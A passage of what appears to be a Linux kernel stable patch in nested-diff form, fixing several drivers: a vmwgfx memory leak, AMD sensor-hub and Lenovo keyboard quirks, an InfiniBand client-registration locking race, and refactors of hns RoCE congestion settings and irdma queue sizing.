+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_gmrid_manager.c b/drivers/gpu/drm/vmwgfx/vmwgfx_gmrid_manager.c
+index 60e3cc537f365..b9e5c8cd31001 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_gmrid_manager.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_gmrid_manager.c
+@@ -65,8 +65,11 @@ static int vmw_gmrid_man_get_node(struct ttm_resource_manager *man,
+ 	ttm_resource_init(bo, place, *res);
+ 
+ 	id = ida_alloc_max(&gman->gmr_ida, gman->max_gmr_ids - 1, GFP_KERNEL);
+-	if (id < 0)
++	if (id < 0) {
++		ttm_resource_fini(man, *res);
++		kfree(*res);
+ 		return id;
++	}
+ 
+ 	spin_lock(&gman->lock);
+ 
+diff --git a/drivers/hid/amd-sfh-hid/amd_sfh_pcie.c b/drivers/hid/amd-sfh-hid/amd_sfh_pcie.c
+index c936d6a51c0cd..9c963ad27f9d1 100644
+--- a/drivers/hid/amd-sfh-hid/amd_sfh_pcie.c
++++ b/drivers/hid/amd-sfh-hid/amd_sfh_pcie.c
+@@ -34,6 +34,8 @@ static int sensor_mask_override = -1;
+ module_param_named(sensor_mask, sensor_mask_override, int, 0444);
+ MODULE_PARM_DESC(sensor_mask, "override the detected sensors mask");
+ 
++static bool intr_disable = true;
++
+ static int amd_sfh_wait_response_v2(struct amd_mp2_dev *mp2, u8 sid, u32 sensor_sts)
+ {
+ 	union cmd_response cmd_resp;
+@@ -54,7 +56,7 @@ static void amd_start_sensor_v2(struct amd_mp2_dev *privdata, struct amd_mp2_sen
+ 
+ 	cmd_base.ul = 0;
+ 	cmd_base.cmd_v2.cmd_id = ENABLE_SENSOR;
+-	cmd_base.cmd_v2.intr_disable = 1;
++	cmd_base.cmd_v2.intr_disable = intr_disable;
+ 	cmd_base.cmd_v2.period = info.period;
+ 	cmd_base.cmd_v2.sensor_id = info.sensor_idx;
+ 	cmd_base.cmd_v2.length = 16;
+@@ -72,7 +74,7 @@ static void amd_stop_sensor_v2(struct amd_mp2_dev *privdata, u16 sensor_idx)
+ 
+ 	cmd_base.ul = 0;
+ 	cmd_base.cmd_v2.cmd_id = DISABLE_SENSOR;
+-	cmd_base.cmd_v2.intr_disable = 1;
++	cmd_base.cmd_v2.intr_disable = intr_disable;
+ 	cmd_base.cmd_v2.period = 0;
+ 	cmd_base.cmd_v2.sensor_id = sensor_idx;
+ 	cmd_base.cmd_v2.length  = 16;
+@@ -86,7 +88,7 @@ static void amd_stop_all_sensor_v2(struct amd_mp2_dev *privdata)
+ 	union sfh_cmd_base cmd_base;
+ 
+ 	cmd_base.cmd_v2.cmd_id = STOP_ALL_SENSORS;
+-	cmd_base.cmd_v2.intr_disable = 1;
++	cmd_base.cmd_v2.intr_disable = intr_disable;
+ 	cmd_base.cmd_v2.period = 0;
+ 	cmd_base.cmd_v2.sensor_id = 0;
+ 
+@@ -288,6 +290,26 @@ int amd_sfh_irq_init(struct amd_mp2_dev *privdata)
+ 	return 0;
+ }
+ 
++static int mp2_disable_intr(const struct dmi_system_id *id)
++{
++	intr_disable = false;
++	return 0;
++}
++
++static const struct dmi_system_id dmi_sfh_table[] = {
++	{
++		/*
++		 * https://bugzilla.kernel.org/show_bug.cgi?id=218104
++		 */
++		.callback = mp2_disable_intr,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "HP"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "HP ProBook x360 435 G7"),
++		},
++	},
++	{}
++};
++
+ static const struct dmi_system_id dmi_nodevs[] = {
+ 	{
+ 		/*
+@@ -311,6 +333,8 @@ static int amd_mp2_pci_probe(struct pci_dev *pdev, const struct pci_device_id *i
+ 	if (dmi_first_match(dmi_nodevs))
+ 		return -ENODEV;
+ 
++	dmi_check_system(dmi_sfh_table);
++
+ 	privdata = devm_kzalloc(&pdev->dev, sizeof(*privdata), GFP_KERNEL);
+ 	if (!privdata)
+ 		return -ENOMEM;
+diff --git a/drivers/hid/amd-sfh-hid/amd_sfh_pcie.h b/drivers/hid/amd-sfh-hid/amd_sfh_pcie.h
+index dfb7cabd82efe..2b125cd9742cb 100644
+--- a/drivers/hid/amd-sfh-hid/amd_sfh_pcie.h
++++ b/drivers/hid/amd-sfh-hid/amd_sfh_pcie.h
+@@ -89,10 +89,10 @@ enum mem_use_type {
+ struct hpd_status {
+ 	union {
+ 		struct {
+-			u32 human_presence_report : 4;
+-			u32 human_presence_actual : 4;
+-			u32 probablity		  : 8;
+ 			u32 object_distance       : 16;
++			u32 probablity		  : 8;
++			u32 human_presence_actual : 4;
++			u32 human_presence_report : 4;
+ 		} shpd;
+ 		u32 val;
+ 	};
+diff --git a/drivers/hid/hid-lenovo.c b/drivers/hid/hid-lenovo.c
+index 149a3c74346b4..f86c1ea83a037 100644
+--- a/drivers/hid/hid-lenovo.c
++++ b/drivers/hid/hid-lenovo.c
+@@ -54,10 +54,10 @@ struct lenovo_drvdata {
+ 	/* 0: Up
+ 	 * 1: Down (undecided)
+ 	 * 2: Scrolling
+-	 * 3: Patched firmware, disable workaround
+ 	 */
+ 	u8 middlebutton_state;
+ 	bool fn_lock;
++	bool middleclick_workaround_cptkbd;
+ };
+ 
+ #define map_key_clear(c) hid_map_usage_clear(hi, usage, bit, max, EV_KEY, (c))
+@@ -621,6 +621,36 @@ static ssize_t attr_sensitivity_store_cptkbd(struct device *dev,
+ 	return count;
+ }
+ 
++static ssize_t attr_middleclick_workaround_show_cptkbd(struct device *dev,
++		struct device_attribute *attr,
++		char *buf)
++{
++	struct hid_device *hdev = to_hid_device(dev);
++	struct lenovo_drvdata *cptkbd_data = hid_get_drvdata(hdev);
++
++	return snprintf(buf, PAGE_SIZE, "%u\n",
++		cptkbd_data->middleclick_workaround_cptkbd);
++}
++
++static ssize_t attr_middleclick_workaround_store_cptkbd(struct device *dev,
++		struct device_attribute *attr,
++		const char *buf,
++		size_t count)
++{
++	struct hid_device *hdev = to_hid_device(dev);
++	struct lenovo_drvdata *cptkbd_data = hid_get_drvdata(hdev);
++	int value;
++
++	if (kstrtoint(buf, 10, &value))
++		return -EINVAL;
++	if (value < 0 || value > 1)
++		return -EINVAL;
++
++	cptkbd_data->middleclick_workaround_cptkbd = !!value;
++
++	return count;
++}
++
+ 
+ static struct device_attribute dev_attr_fn_lock =
+ 	__ATTR(fn_lock, S_IWUSR | S_IRUGO,
+@@ -632,10 +662,16 @@ static struct device_attribute dev_attr_sensitivity_cptkbd =
+ 			attr_sensitivity_show_cptkbd,
+ 			attr_sensitivity_store_cptkbd);
+ 
++static struct device_attribute dev_attr_middleclick_workaround_cptkbd =
++	__ATTR(middleclick_workaround, S_IWUSR | S_IRUGO,
++			attr_middleclick_workaround_show_cptkbd,
++			attr_middleclick_workaround_store_cptkbd);
++
+ 
+ static struct attribute *lenovo_attributes_cptkbd[] = {
+ 	&dev_attr_fn_lock.attr,
+ 	&dev_attr_sensitivity_cptkbd.attr,
++	&dev_attr_middleclick_workaround_cptkbd.attr,
+ 	NULL
+ };
+ 
+@@ -686,23 +722,7 @@ static int lenovo_event_cptkbd(struct hid_device *hdev,
+ {
+ 	struct lenovo_drvdata *cptkbd_data = hid_get_drvdata(hdev);
+ 
+-	if (cptkbd_data->middlebutton_state != 3) {
+-		/* REL_X and REL_Y events during middle button pressed
+-		 * are only possible on patched, bug-free firmware
+-		 * so set middlebutton_state to 3
+-		 * to never apply workaround anymore
+-		 */
+-		if (hdev->product == USB_DEVICE_ID_LENOVO_CUSBKBD &&
+-				cptkbd_data->middlebutton_state == 1 &&
+-				usage->type == EV_REL &&
+-				(usage->code == REL_X || usage->code == REL_Y)) {
+-			cptkbd_data->middlebutton_state = 3;
+-			/* send middle button press which was hold before */
+-			input_event(field->hidinput->input,
+-				EV_KEY, BTN_MIDDLE, 1);
+-			input_sync(field->hidinput->input);
+-		}
+-
++	if (cptkbd_data->middleclick_workaround_cptkbd) {
+ 		/* "wheel" scroll events */
+ 		if (usage->type == EV_REL && (usage->code == REL_WHEEL ||
+ 				usage->code == REL_HWHEEL)) {
+@@ -1166,6 +1186,7 @@ static int lenovo_probe_cptkbd(struct hid_device *hdev)
+ 	cptkbd_data->middlebutton_state = 0;
+ 	cptkbd_data->fn_lock = true;
+ 	cptkbd_data->sensitivity = 0x05;
++	cptkbd_data->middleclick_workaround_cptkbd = true;
+ 	lenovo_features_set_cptkbd(hdev);
+ 
+ 	ret = sysfs_create_group(&hdev->dev.kobj, &lenovo_attr_group_cptkbd);
+diff --git a/drivers/hid/hid-multitouch.c b/drivers/hid/hid-multitouch.c
+index 5ec1f174127a3..3816fd06bc953 100644
+--- a/drivers/hid/hid-multitouch.c
++++ b/drivers/hid/hid-multitouch.c
+@@ -2153,6 +2153,10 @@ static const struct hid_device_id mt_devices[] = {
+ 		HID_DEVICE(BUS_I2C, HID_GROUP_MULTITOUCH_WIN_8,
+ 			USB_VENDOR_ID_SYNAPTICS, 0xcd7e) },
+ 
++	{ .driver_data = MT_CLS_WIN_8_FORCE_MULTI_INPUT,
++		HID_DEVICE(BUS_I2C, HID_GROUP_MULTITOUCH_WIN_8,
++			USB_VENDOR_ID_SYNAPTICS, 0xcddc) },
++
+ 	{ .driver_data = MT_CLS_WIN_8_FORCE_MULTI_INPUT,
+ 		HID_DEVICE(BUS_I2C, HID_GROUP_MULTITOUCH_WIN_8,
+ 			USB_VENDOR_ID_SYNAPTICS, 0xce08) },
+diff --git a/drivers/hwtracing/ptt/hisi_ptt.c b/drivers/hwtracing/ptt/hisi_ptt.c
+index 8d8fa8e8afe04..20a9cddb3723a 100644
+--- a/drivers/hwtracing/ptt/hisi_ptt.c
++++ b/drivers/hwtracing/ptt/hisi_ptt.c
+@@ -654,6 +654,9 @@ static int hisi_ptt_pmu_event_init(struct perf_event *event)
+ 	int ret;
+ 	u32 val;
+ 
++	if (event->attr.type != hisi_ptt->hisi_ptt_pmu.type)
++		return -ENOENT;
++
+ 	if (event->cpu < 0) {
+ 		dev_dbg(event->pmu->dev, "Per-task mode not supported\n");
+ 		return -EOPNOTSUPP;
+@@ -662,9 +665,6 @@ static int hisi_ptt_pmu_event_init(struct perf_event *event)
+ 	if (event->attach_state & PERF_ATTACH_TASK)
+ 		return -EOPNOTSUPP;
+ 
+-	if (event->attr.type != hisi_ptt->hisi_ptt_pmu.type)
+-		return -ENOENT;
+-
+ 	ret = hisi_ptt_trace_valid_filter(hisi_ptt, event->attr.config);
+ 	if (ret < 0)
+ 		return ret;
+diff --git a/drivers/infiniband/core/device.c b/drivers/infiniband/core/device.c
+index 3a9b9a28d858f..453188db39d83 100644
+--- a/drivers/infiniband/core/device.c
++++ b/drivers/infiniband/core/device.c
+@@ -1730,7 +1730,7 @@ static int assign_client_id(struct ib_client *client)
+ {
+ 	int ret;
+ 
+-	down_write(&clients_rwsem);
++	lockdep_assert_held(&clients_rwsem);
+ 	/*
+ 	 * The add/remove callbacks must be called in FIFO/LIFO order. To
+ 	 * achieve this we assign client_ids so they are sorted in
+@@ -1739,14 +1739,11 @@ static int assign_client_id(struct ib_client *client)
+ 	client->client_id = highest_client_id;
+ 	ret = xa_insert(&clients, client->client_id, client, GFP_KERNEL);
+ 	if (ret)
+-		goto out;
++		return ret;
+ 
+ 	highest_client_id++;
+ 	xa_set_mark(&clients, client->client_id, CLIENT_REGISTERED);
+-
+-out:
+-	up_write(&clients_rwsem);
+-	return ret;
++	return 0;
+ }
+ 
+ static void remove_client_id(struct ib_client *client)
+@@ -1776,25 +1773,35 @@ int ib_register_client(struct ib_client *client)
+ {
+ 	struct ib_device *device;
+ 	unsigned long index;
++	bool need_unreg = false;
+ 	int ret;
+ 
+ 	refcount_set(&client->uses, 1);
+ 	init_completion(&client->uses_zero);
++
++	/*
++	 * The devices_rwsem is held in write mode to ensure that a racing
++	 * ib_register_device() sees a consisent view of clients and devices.
++	 */
++	down_write(&devices_rwsem);
++	down_write(&clients_rwsem);
+ 	ret = assign_client_id(client);
+ 	if (ret)
+-		return ret;
++		goto out;
+ 
+-	down_read(&devices_rwsem);
++	need_unreg = true;
+ 	xa_for_each_marked (&devices, index, device, DEVICE_REGISTERED) {
+ 		ret = add_client_context(device, client);
+-		if (ret) {
+-			up_read(&devices_rwsem);
+-			ib_unregister_client(client);
+-			return ret;
+-		}
++		if (ret)
++			goto out;
+ 	}
+-	up_read(&devices_rwsem);
+-	return 0;
++	ret = 0;
++out:
++	up_write(&clients_rwsem);
++	up_write(&devices_rwsem);
++	if (need_unreg && ret)
++		ib_unregister_client(client);
++	return ret;
+ }
+ EXPORT_SYMBOL(ib_register_client);
+ 
+diff --git a/drivers/infiniband/hw/hns/hns_roce_device.h b/drivers/infiniband/hw/hns/hns_roce_device.h
+index 1112afa0af552..8748b65c87ea7 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_device.h
++++ b/drivers/infiniband/hw/hns/hns_roce_device.h
+@@ -595,6 +595,13 @@ struct hns_roce_work {
+ 	u32 queue_num;
+ };
+ 
++enum hns_roce_cong_type {
++	CONG_TYPE_DCQCN,
++	CONG_TYPE_LDCP,
++	CONG_TYPE_HC3,
++	CONG_TYPE_DIP,
++};
++
+ struct hns_roce_qp {
+ 	struct ib_qp		ibqp;
+ 	struct hns_roce_wq	rq;
+@@ -639,6 +646,7 @@ struct hns_roce_qp {
+ 	struct list_head	sq_node; /* all send qps are on a list */
+ 	struct hns_user_mmap_entry *dwqe_mmap_entry;
+ 	u32			config;
++	enum hns_roce_cong_type	cong_type;
+ };
+ 
+ struct hns_roce_ib_iboe {
+@@ -710,13 +718,6 @@ struct hns_roce_eq_table {
+ 	struct hns_roce_eq	*eq;
+ };
+ 
+-enum cong_type {
+-	CONG_TYPE_DCQCN,
+-	CONG_TYPE_LDCP,
+-	CONG_TYPE_HC3,
+-	CONG_TYPE_DIP,
+-};
+-
+ struct hns_roce_caps {
+ 	u64		fw_ver;
+ 	u8		num_ports;
+@@ -847,7 +848,7 @@ struct hns_roce_caps {
+ 	u16		default_aeq_period;
+ 	u16		default_aeq_arm_st;
+ 	u16		default_ceq_arm_st;
+-	enum cong_type	cong_type;
++	enum hns_roce_cong_type cong_type;
+ };
+ 
+ enum hns_roce_device_state {
+diff --git a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+index 58fbb1d3b7f41..d06b19e69a151 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
++++ b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+@@ -4886,12 +4886,15 @@ static int check_cong_type(struct ib_qp *ibqp,
+ 			   struct hns_roce_congestion_algorithm *cong_alg)
+ {
+ 	struct hns_roce_dev *hr_dev = to_hr_dev(ibqp->device);
++	struct hns_roce_qp *hr_qp = to_hr_qp(ibqp);
+ 
+-	if (ibqp->qp_type == IB_QPT_UD)
+-		hr_dev->caps.cong_type = CONG_TYPE_DCQCN;
++	if (ibqp->qp_type == IB_QPT_UD || ibqp->qp_type == IB_QPT_GSI)
++		hr_qp->cong_type = CONG_TYPE_DCQCN;
++	else
++		hr_qp->cong_type = hr_dev->caps.cong_type;
+ 
+ 	/* different congestion types match different configurations */
+-	switch (hr_dev->caps.cong_type) {
++	switch (hr_qp->cong_type) {
+ 	case CONG_TYPE_DCQCN:
+ 		cong_alg->alg_sel = CONG_DCQCN;
+ 		cong_alg->alg_sub_sel = UNSUPPORT_CONG_LEVEL;
+@@ -4919,8 +4922,8 @@ static int check_cong_type(struct ib_qp *ibqp,
+ 	default:
+ 		ibdev_warn(&hr_dev->ib_dev,
+ 			   "invalid type(%u) for congestion selection.\n",
+-			   hr_dev->caps.cong_type);
+-		hr_dev->caps.cong_type = CONG_TYPE_DCQCN;
++			   hr_qp->cong_type);
++		hr_qp->cong_type = CONG_TYPE_DCQCN;
+ 		cong_alg->alg_sel = CONG_DCQCN;
+ 		cong_alg->alg_sub_sel = UNSUPPORT_CONG_LEVEL;
+ 		cong_alg->dip_vld = DIP_INVALID;
+@@ -4939,6 +4942,7 @@ static int fill_cong_field(struct ib_qp *ibqp, const struct ib_qp_attr *attr,
+ 	struct hns_roce_congestion_algorithm cong_field;
+ 	struct ib_device *ibdev = ibqp->device;
+ 	struct hns_roce_dev *hr_dev = to_hr_dev(ibdev);
++	struct hns_roce_qp *hr_qp = to_hr_qp(ibqp);
+ 	u32 dip_idx = 0;
+ 	int ret;
+ 
+@@ -4951,7 +4955,7 @@ static int fill_cong_field(struct ib_qp *ibqp, const struct ib_qp_attr *attr,
+ 		return ret;
+ 
+ 	hr_reg_write(context, QPC_CONG_ALGO_TMPL_ID, hr_dev->cong_algo_tmpl_id +
+-		     hr_dev->caps.cong_type * HNS_ROCE_CONG_SIZE);
++		     hr_qp->cong_type * HNS_ROCE_CONG_SIZE);
+ 	hr_reg_clear(qpc_mask, QPC_CONG_ALGO_TMPL_ID);
+ 	hr_reg_write(&context->ext, QPCEX_CONG_ALG_SEL, cong_field.alg_sel);
+ 	hr_reg_clear(&qpc_mask->ext, QPCEX_CONG_ALG_SEL);
+diff --git a/drivers/infiniband/hw/irdma/uk.c b/drivers/infiniband/hw/irdma/uk.c
+index 280d633d4ec4f..d691cdef5e9a3 100644
+--- a/drivers/infiniband/hw/irdma/uk.c
++++ b/drivers/infiniband/hw/irdma/uk.c
+@@ -1414,6 +1414,78 @@ static void irdma_setup_connection_wqes(struct irdma_qp_uk *qp,
+ 	IRDMA_RING_MOVE_HEAD_BY_COUNT_NOCHECK(qp->initial_ring, move_cnt);
+ }
+ 
++/**
++ * irdma_uk_calc_shift_wq - calculate WQE shift for both SQ and RQ
++ * @ukinfo: qp initialization info
++ * @sq_shift: Returns shift of SQ
++ * @rq_shift: Returns shift of RQ
++ */
++void irdma_uk_calc_shift_wq(struct irdma_qp_uk_init_info *ukinfo, u8 *sq_shift,
++			    u8 *rq_shift)
++{
++	bool imm_support = ukinfo->uk_attrs->hw_rev >= IRDMA_GEN_2;
++
++	irdma_get_wqe_shift(ukinfo->uk_attrs,
++			    imm_support ? ukinfo->max_sq_frag_cnt + 1 :
++					  ukinfo->max_sq_frag_cnt,
++			    ukinfo->max_inline_data, sq_shift);
++
++	irdma_get_wqe_shift(ukinfo->uk_attrs, ukinfo->max_rq_frag_cnt, 0,
++			    rq_shift);
++
++	if (ukinfo->uk_attrs->hw_rev == IRDMA_GEN_1) {
++		if (ukinfo->abi_ver > 4)
++			*rq_shift = IRDMA_MAX_RQ_WQE_SHIFT_GEN1;
++	}
++}
++
++/**
++ * irdma_uk_calc_depth_shift_sq - calculate depth and shift for SQ size.
++ * @ukinfo: qp initialization info
++ * @sq_depth: Returns depth of SQ
++ * @sq_shift: Returns shift of SQ
++ */
++int irdma_uk_calc_depth_shift_sq(struct irdma_qp_uk_init_info *ukinfo,
++				 u32 *sq_depth, u8 *sq_shift)
++{
++	bool imm_support = ukinfo->uk_attrs->hw_rev >= IRDMA_GEN_2;
++	int status;
++
++	irdma_get_wqe_shift(ukinfo->uk_attrs,
++			    imm_support ? ukinfo->max_sq_frag_cnt + 1 :
++			    ukinfo->max_sq_frag_cnt,
++			    ukinfo->max_inline_data, sq_shift);
++	status = irdma_get_sqdepth(ukinfo->uk_attrs, ukinfo->sq_size,
++				   *sq_shift, sq_depth);
++
++	return status;
++}
++
++/**
++ * irdma_uk_calc_depth_shift_rq - calculate depth and shift for RQ size.
++ * @ukinfo: qp initialization info
++ * @rq_depth: Returns depth of RQ
++ * @rq_shift: Returns shift of RQ
++ */
++int irdma_uk_calc_depth_shift_rq(struct irdma_qp_uk_init_info *ukinfo,
++				 u32 *rq_depth, u8 *rq_shift)
++{
++	int status;
++
++	irdma_get_wqe_shift(ukinfo->uk_attrs, ukinfo->max_rq_frag_cnt, 0,
++			    rq_shift);
++
++	if (ukinfo->uk_attrs->hw_rev == IRDMA_GEN_1) {
++		if (ukinfo->abi_ver > 4)
++			*rq_shift = IRDMA_MAX_RQ_WQE_SHIFT_GEN1;
++	}
++
++	status = irdma_get_rqdepth(ukinfo->uk_attrs, ukinfo->rq_size,
++				   *rq_shift, rq_depth);
++
++	return status;
++}
++
+ /**
+  * irdma_uk_qp_init - initialize shared qp
+  * @qp: hw qp (user and kernel)
+@@ -1428,23 +1500,12 @@ int irdma_uk_qp_init(struct irdma_qp_uk *qp, struct irdma_qp_uk_init_info *info)
+ {
+ 	int ret_code = 0;
+ 	u32 sq_ring_size;
+-	u8 sqshift, rqshift;
+ 
+ 	qp->uk_attrs = info->uk_attrs;
+ 	if (info->max_sq_frag_cnt > qp->uk_attrs->max_hw_wq_frags ||
+ 	    info->max_rq_frag_cnt > qp->uk_attrs->max_hw_wq_frags)
+ 		return -EINVAL;
+ 
+-	irdma_get_wqe_shift(qp->uk_attrs, info->max_rq_frag_cnt, 0, &rqshift);
+-	if (qp->uk_attrs->hw_rev == IRDMA_GEN_1) {
+-		irdma_get_wqe_shift(qp->uk_attrs, info->max_sq_frag_cnt,
+-				    info->max_inline_data, &sqshift);
+-		if (info->abi_ver > 4)
+-			rqshift = IRDMA_MAX_RQ_WQE_SHIFT_GEN1;
+-	} else {
+-		irdma_get_wqe_shift(qp->uk_attrs, info->max_sq_frag_cnt + 1,
+-				    info->max_inline_data, &sqshift);
+-	}
+ 	qp->qp_caps = info->qp_caps;
+ 	qp->sq_base = info->sq;
+ 	qp->rq_base = info->rq;
+@@ -1458,7 +1519,7 @@ int irdma_uk_qp_init(struct irdma_qp_uk *qp, struct irdma_qp_uk_init_info *info)
+ 	qp->sq_size = info->sq_size;
+ 	qp->push_mode = false;
+ 	qp->max_sq_frag_cnt = info->max_sq_frag_cnt;
+-	sq_ring_size = qp->sq_size << sqshift;
++	sq_ring_size = qp->sq_size << info->sq_shift;
+ 	IRDMA_RING_INIT(qp->sq_ring, sq_ring_size);
+ 	IRDMA_RING_INIT(qp->initial_ring, sq_ring_size);
+ 	if (info->first_sq_wq) {
+@@ -1473,9 +1534,9 @@ int irdma_uk_qp_init(struct irdma_qp_uk *qp, struct irdma_qp_uk_init_info *info)
+ 	qp->rq_size = info->rq_size;
+ 	qp->max_rq_frag_cnt = info->max_rq_frag_cnt;
+ 	qp->max_inline_data = info->max_inline_data;
+-	qp->rq_wqe_size = rqshift;
++	qp->rq_wqe_size = info->rq_shift;
+ 	IRDMA_RING_INIT(qp->rq_ring, qp->rq_size);
+-	qp->rq_wqe_size_multiplier = 1 << rqshift;
++	qp->rq_wqe_size_multiplier = 1 << info->rq_shift;
+ 	if (qp->uk_attrs->hw_rev == IRDMA_GEN_1)
+ 		qp->wqe_ops = iw_wqe_uk_ops_gen_1;
+ 	else
+diff --git a/drivers/infiniband/hw/irdma/user.h b/drivers/infiniband/hw/irdma/user.h
+index d0cdf609f5e06..1e0e1a71dbada 100644
+--- a/drivers/infiniband/hw/irdma/user.h
++++ b/drivers/infiniband/hw/irdma/user.h
+@@ -295,6 +295,12 @@ void irdma_uk_cq_init(struct irdma_cq_uk *cq,
+ 		      struct irdma_cq_uk_init_info *info);
+ int irdma_uk_qp_init(struct irdma_qp_uk *qp,
+ 		     struct irdma_qp_uk_init_info *info);
++void irdma_uk_calc_shift_wq(struct irdma_qp_uk_init_info *ukinfo, u8 *sq_shift,
++			    u8 *rq_shift);
++int irdma_uk_calc_depth_shift_sq(struct irdma_qp_uk_init_info *ukinfo,
++				 u32 *sq_depth, u8 *sq_shift);
++int irdma_uk_calc_depth_shift_rq(struct irdma_qp_uk_init_info *ukinfo,
++				 u32 *rq_depth, u8 *rq_shift);
+ struct irdma_sq_uk_wr_trk_info {
+ 	u64 wrid;
+ 	u32 wr_len;
+@@ -374,8 +380,12 @@ struct irdma_qp_uk_init_info {
+ 	u32 max_sq_frag_cnt;
+ 	u32 max_rq_frag_cnt;
+ 	u32 max_inline_data;
++	u32 sq_depth;
++	u32 rq_depth;
+ 	u8 first_sq_wq;
+ 	u8 type;
++	u8 sq_shift;
++	u8 rq_shift;
+ 	int abi_ver;
+ 	bool legacy_mode;
+ };
+diff --git a/drivers/infiniband/hw/irdma/verbs.c b/drivers/infiniband/hw/irdma/verbs.c
+index 42c671f209233..76c5f461faca0 100644
+--- a/drivers/infiniband/hw/irdma/verbs.c
++++ b/drivers/infiniband/hw/irdma/verbs.c
+@@ -277,7 +277,7 @@ static int irdma_alloc_ucontext(struct ib_ucontext *uctx,
+ 	struct irdma_alloc_ucontext_req req = {};
+ 	struct irdma_alloc_ucontext_resp uresp = {};
+ 	struct irdma_ucontext *ucontext = to_ucontext(uctx);
+-	struct irdma_uk_attrs *uk_attrs;
++	struct irdma_uk_attrs *uk_attrs = &iwdev->rf->sc_dev.hw_attrs.uk_attrs;
+ 
+ 	if (udata->inlen < IRDMA_ALLOC_UCTX_MIN_REQ_LEN ||
+ 	    udata->outlen < IRDMA_ALLOC_UCTX_MIN_RESP_LEN)
+@@ -292,7 +292,9 @@ static int irdma_alloc_ucontext(struct ib_ucontext *uctx,
+ 	ucontext->iwdev = iwdev;
+ 	ucontext->abi_ver = req.userspace_ver;
+ 
+-	uk_attrs = &iwdev->rf->sc_dev.hw_attrs.uk_attrs;
++	if (req.comp_mask & IRDMA_ALLOC_UCTX_USE_RAW_ATTR)
++		ucontext->use_raw_attrs = true;
++
+ 	/* GEN_1 legacy support with libi40iw */
+ 	if (udata->outlen == IRDMA_ALLOC_UCTX_MIN_RESP_LEN) {
+ 		if (uk_attrs->hw_rev != IRDMA_GEN_1)
+@@ -327,6 +329,7 @@ static int irdma_alloc_ucontext(struct ib_ucontext *uctx,
+ 		uresp.max_hw_cq_size = uk_attrs->max_hw_cq_size;
+ 		uresp.min_hw_cq_size = uk_attrs->min_hw_cq_size;
+ 		uresp.hw_rev = uk_attrs->hw_rev;
++		uresp.comp_mask |= IRDMA_ALLOC_UCTX_USE_RAW_ATTR;
+ 		if (ib_copy_to_udata(udata, &uresp,
+ 				     min(sizeof(uresp), udata->outlen))) {
+ 			rdma_user_mmap_entry_remove(ucontext->db_mmap_entry);
+@@ -566,6 +569,86 @@ static void irdma_setup_virt_qp(struct irdma_device *iwdev,
+ 	}
+ }
+ 
++/**
++ * irdma_setup_umode_qp - setup sq and rq size in user mode qp
++ * @iwdev: iwarp device
++ * @iwqp: qp ptr (user or kernel)
++ * @info: initialize info to return
++ * @init_attr: Initial QP create attributes
++ */
++static int irdma_setup_umode_qp(struct ib_udata *udata,
++				struct irdma_device *iwdev,
++				struct irdma_qp *iwqp,
++				struct irdma_qp_init_info *info,
++				struct ib_qp_init_attr *init_attr)
++{
++	struct irdma_ucontext *ucontext = rdma_udata_to_drv_context(udata,
++				struct irdma_ucontext, ibucontext);
++	struct irdma_qp_uk_init_info *ukinfo = &info->qp_uk_init_info;
++	struct irdma_create_qp_req req;
++	unsigned long flags;
++	int ret;
++
++	ret = ib_copy_from_udata(&req, udata,
++				 min(sizeof(req), udata->inlen));
++	if (ret) {
++		ibdev_dbg(&iwdev->ibdev, "VERBS: ib_copy_from_data fail\n");
++		return ret;
++	}
++
++	iwqp->ctx_info.qp_compl_ctx = req.user_compl_ctx;
++	iwqp->user_mode = 1;
++	if (req.user_wqe_bufs) {
++		info->qp_uk_init_info.legacy_mode = ucontext->legacy_mode;
++		spin_lock_irqsave(&ucontext->qp_reg_mem_list_lock, flags);
++		iwqp->iwpbl = irdma_get_pbl((unsigned long)req.user_wqe_bufs,
++					    &ucontext->qp_reg_mem_list);
++		spin_unlock_irqrestore(&ucontext->qp_reg_mem_list_lock, flags);
++
++		if (!iwqp->iwpbl) {
++			ret = -ENODATA;
++			ibdev_dbg(&iwdev->ibdev, "VERBS: no pbl info\n");
++			return ret;
++		}
++	}
++
++	if (!ucontext->use_raw_attrs) {
++		/**
++		 * Maintain backward compat with older ABI which passes sq and
++		 * rq depth in quanta in cap.max_send_wr and cap.max_recv_wr.
++		 * There is no way to compute the correct value of
++		 * iwqp->max_send_wr/max_recv_wr in the kernel.
++		 */
++		iwqp->max_send_wr = init_attr->cap.max_send_wr;
++		iwqp->max_recv_wr = init_attr->cap.max_recv_wr;
++		ukinfo->sq_size = init_attr->cap.max_send_wr;
++		ukinfo->rq_size = init_attr->cap.max_recv_wr;
++		irdma_uk_calc_shift_wq(ukinfo, &ukinfo->sq_shift,
++				       &ukinfo->rq_shift);
++	} else {
++		ret = irdma_uk_calc_depth_shift_sq(ukinfo, &ukinfo->sq_depth,
++						   &ukinfo->sq_shift);
++		if (ret)
++			return ret;
++
++		ret = irdma_uk_calc_depth_shift_rq(ukinfo, &ukinfo->rq_depth,
++						   &ukinfo->rq_shift);
++		if (ret)
++			return ret;
++
++		iwqp->max_send_wr =
++			(ukinfo->sq_depth - IRDMA_SQ_RSVD) >> ukinfo->sq_shift;
++		iwqp->max_recv_wr =
++			(ukinfo->rq_depth - IRDMA_RQ_RSVD) >> ukinfo->rq_shift;
++		ukinfo->sq_size = ukinfo->sq_depth >> ukinfo->sq_shift;
++		ukinfo->rq_size = ukinfo->rq_depth >> ukinfo->rq_shift;
++	}
++
++	irdma_setup_virt_qp(iwdev, iwqp, info);
++
++	return 0;
++}
++
+ /**
+  * irdma_setup_kmode_qp - setup initialization for kernel mode qp
+  * @iwdev: iwarp device
+@@ -579,40 +662,28 @@ static int irdma_setup_kmode_qp(struct irdma_device *iwdev,
+ 				struct ib_qp_init_attr *init_attr)
+ {
+ 	struct irdma_dma_mem *mem = &iwqp->kqp.dma_mem;
+-	u32 sqdepth, rqdepth;
+-	u8 sqshift, rqshift;
+ 	u32 size;
+ 	int status;
+ 	struct irdma_qp_uk_init_info *ukinfo = &info->qp_uk_init_info;
+-	struct irdma_uk_attrs *uk_attrs = &iwdev->rf->sc_dev.hw_attrs.uk_attrs;
+ 
